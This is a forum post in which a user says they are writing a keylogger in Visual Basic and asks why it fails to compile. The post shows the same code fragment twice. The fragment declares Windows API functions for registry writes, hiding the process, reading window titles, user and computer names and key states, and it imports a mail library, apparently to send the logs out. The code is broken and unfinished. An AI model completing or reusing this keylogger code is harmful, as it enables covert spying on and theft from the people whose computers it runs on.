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Visual help!
Visual help!Posted:
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Ok so i have been working on this keylogger for a while but i cant figure this part out, it keeps saying end of statement expected, here is a peice of the coding,
Imports System.Net.Mail
Function RegOpenKeyExA()as Library advapi32.dll
ByVal hKey As Long, ByVal lpSubKey As String,
ByVal ulOptions As Long
ByVal samDesired As Long, ByVal phkResult As Long) As Long
Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal Y As Long, ByVal cX As Long, ByVal cY As Long, ByVal wFlags As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hWnd As Long) As Long
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer$, ByVal nSize As Long) As Long
Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Const VK_CAPITAL = &H14
Const REG As Long = 1
Const HKEY_LOCAL_MACHINE As Long = &H80000002
Const SWP_NOMOVE = &H2
Const SWP_NOSIZE = &H1
Dim currentwindow As String
Dim logfile As String
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
End Sub
End Class
I get the error on the second line where it says,"Function RegOpenKeyExA()as Library advapi32.dll" and it underlines the advapi32.dll. please help i would much appreciate it, thank you.
Imports System.Net.Mail
Function RegOpenKeyExA()as Library advapi32.dll
ByVal hKey As Long, ByVal lpSubKey As String,
ByVal ulOptions As Long
ByVal samDesired As Long, ByVal phkResult As Long) As Long
Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal Y As Long, ByVal cX As Long, ByVal cY As Long, ByVal wFlags As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hWnd As Long) As Long
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer$, ByVal nSize As Long) As Long
Private Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Const VK_CAPITAL = &H14
Const REG As Long = 1
Const HKEY_LOCAL_MACHINE As Long = &H80000002
Const SWP_NOMOVE = &H2
Const SWP_NOSIZE = &H1
Dim currentwindow As String
Dim logfile As String
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
End Sub
End Class
I get the error on the second line where it says,"Function RegOpenKeyExA()as Library advapi32.dll" and it underlines the advapi32.dll. please help i would much appreciate it, thank you.
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